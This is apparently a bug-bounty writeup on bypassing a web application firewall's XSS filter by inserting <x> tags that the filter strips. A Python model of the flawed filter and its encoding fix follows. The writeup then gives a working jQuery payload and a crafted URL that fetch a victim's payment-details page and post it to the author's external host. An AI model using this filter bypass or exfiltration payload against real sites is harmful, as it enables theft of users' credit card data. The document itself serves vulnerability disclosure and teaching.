Bypassing XSS filter and Stealing User Payment Data

Osama Avvan
Jun 17, 2019 · 2 min read

So here is another writeup about how I bypassed an XSS filter and created a payload to get user credit card data. It was a private program on Bugcrowd; let's just say it was named Redact.

Here is the URL: https://www.redact.com/us/en/my-account/quotes?searchCriteria=QuoteID&amountOperator=equal&searchValue=XSS The parameter searchValue was reflected inside an input field.

So by putting an I was able to break out of the input field. After that, I tried the most basic payload "><script>alert(1)</script>, but unfortunately my request was blocked by the WAF. So I tried another payload, "onmouseover=alert(1), and again my request was blocked by the WAF.

After some playing around, I found out that anything between <> was being removed, so if I typed something like this: "o<x>nmouseover=alert<x>1//

<x> would be removed, leaving only "onmouseover=alert(1)//, and finally I was able to pop an XSS.
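Why a strip-based filter fails against this, and what the fix looks like, as an added Python model (not the vendor's code; the filter behaviour and the payload are constructed from the writeup's description): deleting every <...> token is exactly the operation that reassembles the split keyword, whereas attribute-encoding the reflected value leaves the quote unable to terminate the attribute.

```python
import html
import re

# Constructed model of the observed filter: delete anything between '<' and '>'
# and reflect the rest unchanged (an assumption, not the real WAF's logic).
TAG_RE = re.compile(r"<[^>]*>")


def strip_tags_filter(value: str) -> str:
    """Blocklist-style 'sanitizer': removes every <...> token."""
    return TAG_RE.sub("", value)


def render_unsafe(value: str) -> str:
    """Reflect the tag-stripped value into the input attribute, as the page did."""
    return '<input name="searchValue" value="%s">' % strip_tags_filter(value)


def render_safe(value: str) -> str:
    """Hardened form: attribute-encode on output; '"' becomes &quot; and cannot close the attribute."""
    return '<input name="searchValue" value="%s">' % html.escape(value, quote=True)


def attribute_closed_early(rendered: str) -> bool:
    """True if the value terminated the attribute and an on* handler followed inside the tag."""
    return re.search(r'value="[^"]*"\s*on\w+\s*=', rendered) is not None


# Constructed payload following the writeup's tag-splitting pattern.
PAYLOAD = '"o<x>nmouseover=alert<x>(1)//'


def demo() -> dict:
    """Return what each rendering produces so the difference can be inspected or asserted."""
    return {
        "after_filter": strip_tags_filter(PAYLOAD),
        "unsafe_closes_attribute": attribute_closed_early(render_unsafe(PAYLOAD)),
        "safe_closes_attribute": attribute_closed_early(render_safe(PAYLOAD)),
    }
```

The stripped output is the intact handler, so the filter removed the markers without removing the attack; the encoded output keeps the literal text but no quote or angle bracket survives as markup.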

Now there was a page which allowed the user to view their payment data, https://www.redact.com/us/en/smbpro/my-account/payment-details, so I thought it would be a good idea to include in my report how I could get users' credit card data with this XSS.

So the payload for stealing user credit card data was this: "o<x>nmouseover=$.get<x>('https://www.redact.com/us/en/my-account/payment-details',function<x>(res){$.post<x>('https://osamaavvan.000webhostapp.com/r.php',{res})})//

As the page was using jQuery, I requested the whole payment-details page with $.get() and posted the page content to my server with $.post(); so with this payload I was able to get users' payment data:

https://www.redact.com/us/en/my-account/quotes?searchCriteria=QuoteID&amountOperator=equal&searchValue="o<x>nmouseover=$.get<x>('https://www.redact.com/us/en/my-account/payment-details',function<x>(res){$.post<x>('https://osamaavvan.000webhostapp.com/r.php',{res})})//


But unfortunately, my report was marked as a duplicate.

Thank You for Reading.
